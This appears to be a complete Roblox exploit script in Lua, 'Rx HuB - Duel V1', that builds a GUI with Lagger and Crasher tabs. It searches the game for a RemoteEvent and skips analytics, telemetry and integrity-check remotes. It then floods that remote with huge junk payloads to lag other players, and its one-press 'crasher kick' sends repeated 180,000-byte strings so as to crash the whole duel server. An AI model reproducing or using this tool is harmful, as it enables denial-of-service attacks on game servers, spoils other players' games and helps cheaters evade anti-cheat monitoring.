--// Rx HuB - Duel V1
-- Menu + RX icon draggable, linear capped power ping, safe GUI parent/APIs.

local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local CoreGui = game:GetService("CoreGui")
local UserInputService = game:GetService("UserInputService")
local HttpService = game:GetService("HttpService")

------------------------------------------------
-- CONFIG
------------------------------------------------
local CONFIG_FILE = "RxHub_Duel_Config.json"

local hasWrite = false
pcall(function()
    if writefile and readfile and isfile then
        hasWrite = true
    end
end)

local Config = {
    LagKeyName = "F",
    LagPower = 40,
}

local function LoadConfig()
    if not hasWrite then return end
    if not isfile(CONFIG_FILE) then return end
    local ok, data = pcall(readfile, CONFIG_FILE)
    if not ok then return end
    local ok2, decoded = pcall(HttpService.JSONDecode, HttpService, data)
    if not ok2 or type(decoded) ~= "table" then return end
    if decoded.LagKeyName then Config.LagKeyName = decoded.LagKeyName end
    if decoded.LagPower then Config.LagPower = tonumber(decoded.LagPower) or Config.LagPower end
end

local function SaveConfig()
    if not hasWrite then return end
    local ok, encoded = pcall(HttpService.JSONEncode, HttpService, Config)
    if not ok then return end
    pcall(writefile, CONFIG_FILE, encoded)
end

LoadConfig()

local function getKeyCodeFromName(name)
    for _, key in ipairs(Enum.KeyCode:GetEnumItems()) do
        if key.Name == name then
            return key
        end
    end
    return Enum.KeyCode.F
end

local LagKeyCode = getKeyCodeFromName(Config.LagKeyName)

------------------------------------------------
-- COLORS
------------------------------------------------
local COLORS = {
    BgTop     = Color3.fromRGB(5, 15, 5),
    BgBottom  = Color3.fromRGB(10, 30, 10),
    Panel     = Color3.fromRGB(12, 20, 12),
    Text      = Color3.fromRGB(235, 235, 235),
    Accent    = Color3.fromRGB(60, 255, 120),
    AccentSoft= Color3.fromRGB(30, 140, 70),
    TabOn     = Color3.fromRGB(30, 80, 40),
    TabOff    = Color3.fromRGB(20, 40, 25),
    BtnOff    = Color3.fromRGB(25, 40, 30),
    BtnOn     = Color3.fromRGB(40, 120, 70),
    SliderBg  = Color3.fromRGB(25, 40, 30),
    SliderFill= Color3.fromRGB(80, 255, 140),
}

------------------------------------------------
-- ROOT GUI
------------------------------------------------
local gui = Instance.new("ScreenGui")
gui.Name = "RxHub"
gui.ResetOnSpawn = false

local function safeParent(guiObj)
    local ok, ui = pcall(function()
        return gethui and gethui()
    end)
    if ok and ui then
        guiObj.Parent = ui
        return
    end

    local ok2 = pcall(function()
        guiObj.Parent = CoreGui
    end)
    if ok2 and guiObj.Parent then
        return
    end

    guiObj.Parent = LocalPlayer:WaitForChild("PlayerGui")
end

safeParent(gui)

local main = Instance.new("Frame")
main.Size = UDim2.new(0, 520, 0, 310)
main.Position = UDim2.new(0.5, -260, 0.5, -155)
main.BackgroundColor3 = COLORS.BgBottom
main.BorderSizePixel = 0
main.Active = true
main.Draggable = true -- whole menu draggable [web:88][web:196]
main.Parent = gui
Instance.new("UICorner", main).CornerRadius = UDim.new(0, 14)

local skyGrad = Instance.new("UIGradient")
skyGrad.Color = ColorSequence.new({
    ColorSequenceKeypoint.new(0, COLORS.BgTop),
    ColorSequenceKeypoint.new(1, COLORS.BgBottom),
})
skyGrad.Rotation = 90
skyGrad.Parent = main

local stroke = Instance.new("UIStroke")
stroke.Color = COLORS.Accent
stroke.Thickness = 1.8
stroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
stroke.Parent = main

local starsFolder = Instance.new("Folder", main)
starsFolder.Name = "Stars"
local function makeStar(pos)
    local s = Instance.new("Frame")
    s.Size = UDim2.new(0, 4, 0, 4)
    s.Position = pos
    s.BackgroundColor3 = COLORS.Accent
    s.BorderSizePixel = 0
    s.BackgroundTransparency = 0.1
    s.Parent = starsFolder
    Instance.new("UICorner", s).CornerRadius = UDim.new(1, 0)
end

makeStar(UDim2.new(0.08, 0, 0.12, 0))
makeStar(UDim2.new(0.22, 0, 0.26, 0))
makeStar(UDim2.new(0.78, 0, 0.16, 0))
makeStar(UDim2.new(0.9, 0, 0.35, 0))
makeStar(UDim2.new(0.18, 0, 0.8, 0))
makeStar(UDim2.new(0.87, 0, 0.74, 0))

local inner = Instance.new("Frame")
inner.Size = UDim2.new(1, -10, 1, -10)
inner.Position = UDim2.new(0, 5, 0, 5)
inner.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
inner.BackgroundTransparency = 0.35
inner.BorderSizePixel = 0
inner.Parent = main
Instance.new("UICorner", inner).CornerRadius = UDim.new(0, 12)

------------------------------------------------
-- TOP BAR + RX HANDLE + MINIMIZE
------------------------------------------------
local top = Instance.new("Frame")
top.Size = UDim2.new(1, 0, 0, 38)
top.BackgroundTransparency = 1
top.Parent = inner

local titleBar = Instance.new("Frame")
titleBar.Size = UDim2.new(1, -50, 1, 0)
titleBar.Position = UDim2.new(0, 50, 0, 0)
titleBar.BackgroundTransparency = 1
titleBar.Parent = top

local title = Instance.new("TextLabel")
title.Size = UDim2.new(0, 260, 1, 0)
title.Position = UDim2.new(0, 10, 0, 0)
title.BackgroundTransparency = 1
title.Font = Enum.Font.GothamBold
title.TextSize = 20
title.TextXAlignment = Enum.TextXAlignment.Left
title.TextColor3 = COLORS.Text
title.Text = "Rx HuB - Duel V1"
title.Parent = titleBar

local statusDot = Instance.new("Frame")
statusDot.Size = UDim2.new(0, 8, 0, 8)
statusDot.Position = UDim2.new(0, 280, 0.5, -4)
statusDot.BackgroundColor3 = COLORS.Accent
statusDot.BorderSizePixel = 0
statusDot.Parent = titleBar
Instance.new("UICorner", statusDot).CornerRadius = UDim.new(1, 0)

local rxHandle = Instance.new("Frame")
rxHandle.Size = UDim2.new(0, 32, 0, 32)
rxHandle.Position = UDim2.new(0, 8, 0, 3)
rxHandle.BackgroundColor3 = COLORS.Panel
rxHandle.BorderSizePixel = 0
rxHandle.Active = true
rxHandle.Draggable = true -- RX icon draggable
rxHandle.Parent = top
Instance.new("UICorner", rxHandle).CornerRadius = UDim.new(0, 6)

local rxStroke = Instance.new("UIStroke")
rxStroke.Color = COLORS.Accent
rxStroke.Thickness = 1.4
rxStroke.Parent = rxHandle

local rxLabel = Instance.new("TextLabel")
rxLabel.Size = UDim2.new(1, 0, 1, 0)
rxLabel.BackgroundTransparency = 1
rxLabel.Font = Enum.Font.GothamBold
rxLabel.TextSize = 18
rxLabel.TextColor3 = COLORS.Accent
rxLabel.Text = "RX"
rxLabel.Parent = rxHandle

-- RX drag also moves main
rxHandle.InputBegan:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 then
        local dragStart = input.Position
        local startPos = main.Position

        local moveConn, endConn
        moveConn = UserInputService.InputChanged:Connect(function(i)
            if i.UserInputType == Enum.UserInputType.MouseMovement then
                local delta = i.Position - dragStart
                main.Position = UDim2.new(
                    startPos.X.Scale, startPos.X.Offset + delta.X,
                    startPos.Y.Scale, startPos.Y.Offset + delta.Y
                )
            end
        end)
        endConn = input.Changed:Connect(function()
            if input.UserInputState == Enum.UserInputState.End then
                if moveConn then moveConn:Disconnect() end
                if endConn then endConn:Disconnect() end
            end
        end)
    end
end)

local closeBtn = Instance.new("TextButton")
closeBtn.Size = UDim2.new(0, 28, 0, 28)
closeBtn.Position = UDim2.new(1, -34, 0, 5)
closeBtn.BackgroundColor3 = COLORS.AccentSoft
closeBtn.Font = Enum.Font.GothamBold
closeBtn.Text = "X"
closeBtn.TextColor3 = COLORS.Text
closeBtn.TextSize = 14
closeBtn.BorderSizePixel = 0
closeBtn.Parent = top
Instance.new("UICorner", closeBtn).CornerRadius = UDim.new(1, 0)

closeBtn.MouseButton1Click:Connect(function()
    gui:Destroy()
end)

local minimized = false

local minBtn = Instance.new("TextButton")
minBtn.Size = UDim2.new(0, 28, 0, 28)
minBtn.Position = UDim2.new(1, -68, 0, 5)
minBtn.BackgroundColor3 = COLORS.TabOff
minBtn.Font = Enum.Font.GothamBold
minBtn.Text = "_"
minBtn.TextColor3 = COLORS.Text
minBtn.TextSize = 16
minBtn.BorderSizePixel = 0
minBtn.Parent = top
Instance.new("UICorner", minBtn).CornerRadius = UDim.new(1, 0)

local miniFrame = Instance.new("Frame")
miniFrame.Size = UDim2.new(0, 90, 0, 32)
miniFrame.Position = UDim2.new(0, 20, 0.9, -20)
miniFrame.BackgroundColor3 = COLORS.Panel
miniFrame.BorderSizePixel = 0
miniFrame.Visible = false
miniFrame.Active = true
miniFrame.Draggable = true
miniFrame.Parent = gui
Instance.new("UICorner", miniFrame).CornerRadius = UDim.new(0, 8)

local miniStroke = Instance.new("UIStroke")
miniStroke.Color = COLORS.Accent
miniStroke.Thickness = 1.4
miniStroke.Parent = miniFrame

local miniText = Instance.new("TextButton")
miniText.Size = UDim2.new(1, 0, 1, 0)
miniText.BackgroundTransparency = 1
miniText.Font = Enum.Font.GothamBold
miniText.TextSize = 14
miniText.TextColor3 = COLORS.Text
miniText.Text = "RX"
miniText.Parent = miniFrame

miniText.MouseButton1Click:Connect(function()
    main.Visible = true
    miniFrame.Visible = false
    minimized = false
end)

minBtn.MouseButton1Click:Connect(function()
    if minimized then
        main.Visible = true
        miniFrame.Visible = false
        minimized = false
    else
        main.Visible = false
        miniFrame.Visible = true
        minimized = true
    end
end)

------------------------------------------------
-- TABS
------------------------------------------------
local tabsBar = Instance.new("Frame")
tabsBar.Size = UDim2.new(1, -20, 0, 28)
tabsBar.Position = UDim2.new(0, 10, 0, 42)
tabsBar.BackgroundTransparency = 1
tabsBar.Parent = inner

local tabsLayout = Instance.new("UIListLayout")
tabsLayout.FillDirection = Enum.FillDirection.Horizontal
tabsLayout.HorizontalAlignment = Enum.HorizontalAlignment.Left
tabsLayout.VerticalAlignment = Enum.VerticalAlignment.Center
tabsLayout.Padding = UDim.new(0, 6)
tabsLayout.Parent = tabsBar

local pagesHolder = Instance.new("Frame")
pagesHolder.Size = UDim2.new(1, -20, 1, -86)
pagesHolder.Position = UDim2.new(0, 10, 0, 76)
pagesHolder.BackgroundTransparency = 1
pagesHolder.Parent = inner

local function newTab(name)
    local b = Instance.new("TextButton")
    b.Size = UDim2.new(0, 110, 1, 0)
    b.BackgroundColor3 = COLORS.TabOff
    b.TextColor3 = COLORS.Text
    b.Text = name
    b.Font = Enum.Font.GothamBold
    b.TextSize = 13
    b.BorderSizePixel = 0
    b.Parent = tabsBar
    Instance.new("UICorner", b).CornerRadius = UDim.new(0, 7)
    return b
end

local function newPage()
    local p = Instance.new("Frame")
    p.Size = UDim2.new(1, 0, 1, 0)
    p.BackgroundTransparency = 1
    p.Visible = false
    p.Parent = pagesHolder
    return p
end

local tabs = {}
tabs["Lagger"]  = newTab("Lagger")
tabs["Crash"]   = newTab("Crasher")
tabs["Config"]  = newTab("Config")

local pageLag   = newPage()
local pageCrash = newPage()
local pageCfg   = newPage()

local currentPage = nil
local function setTab(which, page)
    for k, b in pairs(tabs) do
        b.BackgroundColor3 = (k == which) and COLORS.TabOn or COLORS.TabOff
    end
    if currentPage then currentPage.Visible = false end
    page.Visible = true
    currentPage = page
end

tabs["Lagger"].MouseButton1Click:Connect(function() setTab("Lagger", pageLag) end)
tabs["Crash"].MouseButton1Click:Connect(function() setTab("Crash", pageCrash) end)
tabs["Config"].MouseButton1Click:Connect(function() setTab("Config", pageCfg) end)

setTab("Lagger", pageLag)

------------------------------------------------
-- REMOTE FINDER
------------------------------------------------
local LAG_UUID = "d80e2217-36b8-4bdc-9a46-2281c6f70b28"

local function FindBestRemote()
    local foundRemotes = {}
    local priorityTargets = {
        "WhyAreTheyTargetingMe!!",
        "FisherMan",
        "Chat",
        "AFK",
        "CookiesService"
    }
    local blacklisted = {
        "PlaceCooldownFromChat","AdminPanelService","AdminPanel","IntegrityCheckProcessor",
        "LocalizationTableAnalyticsSender","LocalizationService","Analytics","Telemetry",
        "Logger","Reporter","CanChatWith","SetPlayerBlockList","UpdatePlayerBlockList",
        "NewPlayerGroupDetails","NewPlayerCanManageDetails","SendPlayerBlockList",
        "UpdateLocalPlayerBlockList","SendPlayerProfileSettings","RequestPlayerProfileSettings",
        "UpdatePlayerProfileSettings","ShowFriendJoinedPlayerToast","ShowPlayerJoinedFriendsToast",
        "CreateOrJoinParty","ServerSideBulkPurchaseEvent","SetDialogInUse",
        "ContactListInvokeIrisInvite","ContactListIrisInviteTeleport","UpdateCurrentCall",
        "RequestDeviceCameraOrientationCapability","ReceiveLikelySpeakingUsers","ReferredPlayerJoin",
        "Update","RE/Tools/Cooldown","RE/FuseMachine/RevealNow","RE/FuseMachine/FuseAnimation",
        "RE/NotificationService/Notify","RE/PlotService/ClaimCoins","RE/PlotService/Sell",
        "RE/PlotService/Open","RE/PlotService/ToggleFriends","RE/PlotService/CashCollected",
        "RE/ChatService/ChatMessage","RE/SoundService/PlayClientSound","RE/Snapshot/RealiableChannel",
        "RE/CommandsService/OpenCommandBar","RE/92e5a494-0ab4-4c4e-ae6b-96e5f4a2a698",
        "92e5a494-0ab4-4c4e-ae6b-96e5f4a2a698","6411a778-07a5-4513-b1c7-60b65ae05ac8",
        "RE/GameService/SpawnEffect","RE/Leaderboard/ReplicateDisplayNames",
        "eb9dee81-7718-4020-b6b2-219888488d13","fce51e06-a587-4ff0-9e19-869eb1859a01",
        "680db8c7-c46a-492c-b451-6e980910902c","RE/StealService/Grab","RE/PlotService/Place",
        "RE/StealService/StealingSuccess","RE/StealService/StealingFailure","RE/CombatService/ApplyImpulse",
        "RE/InventoryService/Sort","RE/StockEventService/SetFocused","RE/StockEventService/Return",
        "RE/StockEventService/Redeem","RE/MerchantService/SetFocused","RE/MerchantService/Animation",
        "RE/SantaMerchantService/SetFocused","RE/SantaMerchantService/Animation",
        "RE/SantaMerchantService/CollectGoldElf","RE/ShopService/Purchase","RE/TutorialService/StartTutorial",
        "RE/TutorialService/FinishTutorial","RE/TeleportService/Reconnect"
    }

    for _, v in pairs(game:GetDescendants()) do
        if v:IsA("RemoteEvent") then
            local fullName = v:GetFullName()
            local rName = v.Name
            local bad = false
            for _, b in ipairs(blacklisted) do
                if string.find(fullName, b, 1, true) or string.find(rName, b, 1, true) then
                    bad = true
                    break
                end
            end
            if not bad then
                local isPriority = false
                for _, p in ipairs(priorityTargets) do
                    if string.find(rName, p, 1, true) then
                        isPriority = true
                        table.insert(foundRemotes, 1, v)
                        break
                    end
                end
                if not isPriority then
                    table.insert(foundRemotes, v)
                end
            end
        end
    end
    return #foundRemotes > 0 and foundRemotes[1] or nil
end

------------------------------------------------
-- LAGGER PAGE
------------------------------------------------
local lagTitle = Instance.new("TextLabel")
lagTitle.Size = UDim2.new(1, -20, 0, 24)
lagTitle.Position = UDim2.new(0, 10, 0, 6)
lagTitle.BackgroundTransparency = 1
lagTitle.Font = Enum.Font.GothamBold
lagTitle.TextSize = 18
lagTitle.TextXAlignment = Enum.TextXAlignment.Left
lagTitle.TextColor3 = COLORS.Text
lagTitle.Text = "Lagger (duel lag)"
lagTitle.Parent = pageLag

local lagToggle = Instance.new("TextButton")
lagToggle.Size = UDim2.new(0, 170, 0, 38)
lagToggle.Position = UDim2.new(0, 10, 0, 40)
lagToggle.BackgroundColor3 = COLORS.BtnOff
lagToggle.TextColor3 = COLORS.Text
lagToggle.Text = "Lag: OFF"
lagToggle.Font = Enum.Font.GothamBold
lagToggle.TextSize = 16
lagToggle.BorderSizePixel = 0
lagToggle.Parent = pageLag
Instance.new("UICorner", lagToggle).CornerRadius = UDim.new(0, 8)

local keybindLabel = Instance.new("TextLabel")
keybindLabel.Size = UDim2.new(0, 40, 0, 20)
keybindLabel.Position = UDim2.new(0, 190, 0, 40)
keybindLabel.BackgroundTransparency = 1
keybindLabel.Font = Enum.Font.Gotham
keybindLabel.TextSize = 14
keybindLabel.TextXAlignment = Enum.TextXAlignment.Left
keybindLabel.TextColor3 = COLORS.Text
keybindLabel.Text = "Key:"
keybindLabel.Parent = pageLag

local keybindBtn = Instance.new("TextButton")
keybindBtn.Size = UDim2.new(0, 90, 0, 38)
keybindBtn.Position = UDim2.new(0, 230, 0, 40)
keybindBtn.BackgroundColor3 = COLORS.BtnOff
keybindBtn.BorderSizePixel = 0
keybindBtn.Font = Enum.Font.Gotham
keybindBtn.TextSize = 14
keybindBtn.TextColor3 = COLORS.Text
keybindBtn.Text = LagKeyCode.Name
keybindBtn.Parent = pageLag
Instance.new("UICorner", keybindBtn).CornerRadius = UDim.new(0, 6)

local powerLabel = Instance.new("TextLabel")
powerLabel.Size = UDim2.new(0, 90, 0, 20)
powerLabel.Position = UDim2.new(0, 10, 0, 86)
powerLabel.BackgroundTransparency = 1
powerLabel.Font = Enum.Font.Gotham
powerLabel.TextSize = 14
powerLabel.TextXAlignment = Enum.TextXAlignment.Left
powerLabel.TextColor3 = COLORS.Text
powerLabel.Text = "Power:"
powerLabel.Parent = pageLag

local powerBox = Instance.new("TextBox")
powerBox.Size = UDim2.new(0, 60, 0, 22)
powerBox.Position = UDim2.new(0, 70, 0, 84)
powerBox.BackgroundColor3 = COLORS.SliderBg
powerBox.BorderSizePixel = 0
powerBox.Font = Enum.Font.Gotham
powerBox.TextSize = 14
powerBox.TextColor3 = COLORS.Text
powerBox.Text = tostring(Config.LagPower)
powerBox.ClearTextOnFocus = false
powerBox.Parent = pageLag
Instance.new("UICorner", powerBox).CornerRadius = UDim.new(0, 6)

local pingLabel = Instance.new("TextLabel")
pingLabel.Size = UDim2.new(0, 220, 0, 20)
pingLabel.Position = UDim2.new(0, 140, 0, 84)
pingLabel.BackgroundTransparency = 1
pingLabel.Font = Enum.Font.Gotham
pingLabel.TextSize = 14
pingLabel.TextXAlignment = Enum.TextXAlignment.Left
pingLabel.TextColor3 = COLORS.Text
pingLabel.Text = "Ping: ~?"
pingLabel.Parent = pageLag

local simPingLabel = Instance.new("TextLabel")
simPingLabel.Size = UDim2.new(0, 220, 0, 20)
simPingLabel.Position = UDim2.new(0, 140, 0, 104)
simPingLabel.BackgroundTransparency = 1
simPingLabel.Font = Enum.Font.Gotham
simPingLabel.TextSize = 14
simPingLabel.TextXAlignment = Enum.TextXAlignment.Left
simPingLabel.TextColor3 = COLORS.Text
simPingLabel.Text = "Power ping: ~?"
simPingLabel.Parent = pageLag

local sliderBg = Instance.new("Frame")
sliderBg.Size = UDim2.new(0, 300, 0, 12)
sliderBg.Position = UDim2.new(0, 10, 0, 132)
sliderBg.BackgroundColor3 = COLORS.SliderBg
sliderBg.BorderSizePixel = 0
sliderBg.Parent = pageLag
Instance.new("UICorner", sliderBg).CornerRadius = UDim.new(1, 0)

local sliderFill = Instance.new("Frame")
sliderFill.Size = UDim2.new(Config.LagPower / 500, 0, 1, 0)
sliderFill.BackgroundColor3 = COLORS.SliderFill
sliderFill.BorderSizePixel = 0
sliderFill.Parent = sliderBg
Instance.new("UICorner", sliderFill).CornerRadius = UDim.new(1, 0)

local LAG_POWER = Config.LagPower
local LAG_WAIT = 0.035
local lagTarget = nil
local lagThread = nil
local lagOn = false
local draggingSlider = false
local listeningKey = false
local lagKeyConnection

local powerPingCurrent = 0

local function updatePingLabel()
    local pingSec = 0
    local ok = pcall(function()
        pingSec = LocalPlayer:GetNetworkPing()
    end)
    if not ok then
        pingLabel.Text = "Ping: n/a"
        return
    end
    local pingMs = math.floor(pingSec * 2000) -- convert to ms [web:103]
    pingLabel.Text = "Ping: ~" .. tostring(pingMs) .. " ms"
end

local function computePowerPing(p)
    local ms = p * 5
    ms = math.clamp(ms, 0, 2000)
    return math.floor(ms)
end

local function updateSimPingLabel()
    simPingLabel.Text = "Power ping: ~" .. tostring(powerPingCurrent) .. " ms"
end

local function setPowerFromNumber(n)
    n = math.clamp(n, 10, 500)
    LAG_POWER = n
    Config.LagPower = n
    powerBox.Text = tostring(n)
    local alpha = n / 500
    sliderFill.Size = UDim2.new(alpha, 0, 1, 0)
    SaveConfig()

    powerPingCurrent = computePowerPing(LAG_POWER)
    updateSimPingLabel()
end

setPowerFromNumber(Config.LagPower)
updatePingLabel()

sliderBg.InputBegan:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 then
        draggingSlider = true
    end
end)
sliderBg.InputEnded:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 then
        draggingSlider = false
    end
end)

UserInputService.InputChanged:Connect(function(input)
    if draggingSlider and input.UserInputType == Enum.UserInputType.MouseMovement then
        local rel = (input.Position.X - sliderBg.AbsolutePosition.X)
        rel = math.clamp(rel, 0, sliderBg.AbsoluteSize.X)
        local alpha = rel / sliderBg.AbsoluteSize.X
        local power = math.floor(10 + alpha * (500 - 10))
        setPowerFromNumber(power)
    end
end)

powerBox.FocusLost:Connect(function()
    local num = tonumber(powerBox.Text)
    if num then
        setPowerFromNumber(num)
    else
        powerBox.Text = tostring(LAG_POWER)
    end
end)

task.spawn(function()
    while gui.Parent do
        updatePingLabel()
        task.wait(0.5)
    end
end)

local function startLag()
    if lagOn then return end
    lagOn = true

    if not lagTarget or not lagTarget.Parent then
        lagTarget = FindBestRemote()
    end
    if not lagTarget then
        lagOn = false
        warn("Rx Hub: no remote for lag")
        return
    end

    lagThread = task.spawn(function()
        while lagOn do
            if not lagTarget or not lagTarget.Parent then
                lagTarget = FindBestRemote()
                if not lagTarget then
                    lagOn = false
                    warn("Rx Hub: lost remote")
                    break
                end
            end

            local payloadSize = LAG_POWER * 150
            local payload = string.rep("X", payloadSize)
            local fireCount = math.max(1, math.floor(LAG_POWER / 50))

            for _ = 1, fireCount do
                pcall(function()
                    lagTarget:FireServer(LAG_UUID, payload)
                end)
            end

            task.wait(LAG_WAIT)
        end
    end)
end

local function stopLag()
    if not lagOn then return end
    lagOn = false
    if lagThread then
        task.cancel(lagThread)
        lagThread = nil
    end
end

local function toggleLag()
    if listeningKey then return end
    if lagOn then
        stopLag()
        lagToggle.Text = "Lag: OFF"
        lagToggle.BackgroundColor3 = COLORS.BtnOff
    else
        powerPingCurrent = computePowerPing(LAG_POWER)
        updateSimPingLabel()

        startLag()
        lagToggle.Text = "Lag: ON"
        lagToggle.BackgroundColor3 = COLORS.BtnOn
    end
end

lagToggle.MouseButton1Click:Connect(toggleLag)

local function bindLagKeyConnection()
    if lagKeyConnection then
        lagKeyConnection:Disconnect()
        lagKeyConnection = nil
    end

    lagKeyConnection = UserInputService.InputBegan:Connect(function(input, gpe)
        if gpe then return end
        if listeningKey then return end
        if input.KeyCode == LagKeyCode then
            toggleLag()
        end
    end)
end

bindLagKeyConnection()

keybindBtn.MouseButton1Click:Connect(function()
    if listeningKey then return end
    listeningKey = true
    keybindBtn.Text = "Press..."

    if lagKeyConnection then
        lagKeyConnection:Disconnect()
        lagKeyConnection = nil
    end

    local tempConn
    tempConn = UserInputService.InputBegan:Connect(function(input, gpe)
        if gpe then return end
        if input.KeyCode ~= Enum.KeyCode.Unknown then
            LagKeyCode = input.KeyCode
            Config.LagKeyName = input.KeyCode.Name
            keybindBtn.Text = input.KeyCode.Name
            SaveConfig()

            listeningKey = false
            tempConn:Disconnect()
            bindLagKeyConnection()
        end
    end)
end)

------------------------------------------------
-- CRASHER PAGE
------------------------------------------------
local crashTitle = Instance.new("TextLabel")
crashTitle.Size = UDim2.new(1, -20, 0, 24)
crashTitle.Position = UDim2.new(0, 10, 0, 6)
crashTitle.BackgroundTransparency = 1
crashTitle.Font = Enum.Font.GothamBold
crashTitle.TextSize = 18
crashTitle.TextXAlignment = Enum.TextXAlignment.Left
crashTitle.TextColor3 = COLORS.Text
crashTitle.Text = "Crasher Kick"
crashTitle.Parent = pageCrash

local crashBtn = Instance.new("TextButton")
crashBtn.Size = UDim2.new(0, 260, 0, 40)
crashBtn.Position = UDim2.new(0, 10, 0, 40)
crashBtn.BackgroundColor3 = COLORS.BtnOff
crashBtn.TextColor3 = COLORS.Text
crashBtn.Text = "CRASHER KICK (ONE PRESS)"
crashBtn.Font = Enum.Font.GothamBold
crashBtn.TextSize = 14
crashBtn.BorderSizePixel = 0
crashBtn.Parent = pageCrash
Instance.new("UICorner", crashBtn).CornerRadius = UDim.new(0, 8)

local crashLabel = Instance.new("TextLabel")
crashLabel.Size = UDim2.new(1, -20, 0, 60)
crashLabel.Position = UDim2.new(0, 10, 0, 90)
crashLabel.BackgroundTransparency = 1
crashLabel.Font = Enum.Font.Gotham
crashLabel.TextSize = 14
crashLabel.TextXAlignment = Enum.TextXAlignment.Left
crashLabel.TextYAlignment = Enum.TextYAlignment.Top
crashLabel.TextColor3 = COLORS.Text
crashLabel.TextWrapped = true
crashLabel.Text = "One click ultra-spam using same remote as lagger. If remote is global, this aims to kick/lag the whole duel server."
crashLabel.Parent = pageCrash

local crashMsg = Instance.new("TextLabel")
crashMsg.Size = UDim2.new(1, -20, 0, 24)
crashMsg.Position = UDim2.new(0, 10, 0, 155)
crashMsg.BackgroundTransparency = 1
crashMsg.Font = Enum.Font.GothamBold
crashMsg.TextSize = 16
crashMsg.TextXAlignment = Enum.TextXAlignment.Left
crashMsg.TextColor3 = COLORS.Accent
crashMsg.Text = ""
crashMsg.Parent = pageCrash

local crashing = false

crashBtn.MouseButton1Click:Connect(function()
    if crashing then return end
    crashing = true
    crashBtn.BackgroundColor3 = COLORS.BtnOn
    crashBtn.Text = "CRASHING..."

    crashMsg.Text = ""

    local remote = FindBestRemote()
    if not remote then
        crashing = false
        crashBtn.BackgroundColor3 = COLORS.BtnOff
        crashBtn.Text = "No Remote Found"
        crashMsg.Text = "No remote → cannot crash."
        return
    end

    task.spawn(function()
        local start = tick()
        while tick() - start < 4 do
            local payload = string.rep("Y", 180000)
            for _ = 1, 90 do
                pcall(function()
                    remote:FireServer(LAG_UUID, payload)
                end)
            end
            task.wait(0.012)
        end
        crashing = false
        crashBtn.BackgroundColor3 = COLORS.BtnOff
        crashBtn.Text = "CRASHER KICK (ONE PRESS)"
        crashMsg.Text = "This server crashed (or is about to)."
    end)
end)

------------------------------------------------
-- CONFIG PAGE
------------------------------------------------
local cfgTitle = Instance.new("TextLabel")
cfgTitle.Size = UDim2.new(1, -20, 0, 24)
cfgTitle.Position = UDim2.new(0, 10, 0, 6)
cfgTitle.BackgroundTransparency = 1
cfgTitle.Font = Enum.Font.GothamBold
cfgTitle.TextSize = 18
cfgTitle.TextXAlignment = Enum.TextXAlignment.Left
cfgTitle.TextColor3 = COLORS.Text
cfgTitle.Text = "Config"
cfgTitle.Parent = pageCfg

local cfgInfo = Instance.new("TextLabel")
cfgInfo.Size = UDim2.new(1, -20, 0, 80)
cfgInfo.Position = UDim2.new(0, 10, 0, 40)
cfgInfo.BackgroundTransparency = 1
cfgInfo.Font = Enum.Font.Gotham
cfgInfo.TextSize = 14
cfgInfo.TextXAlignment = Enum.TextXAlignment.Left
cfgInfo.TextYAlignment = Enum.TextYAlignment.Top
cfgInfo.TextColor3 = COLORS.Text
cfgInfo.TextWrapped = true
cfgInfo.Text = "Saved settings:\n- Lag keybind: " .. Config.LagKeyName .. "\n- Lag power: " .. tostring(Config.LagPower) .. "\n\nConfig file: " .. CONFIG_FILE
cfgInfo.Parent = pageCfg
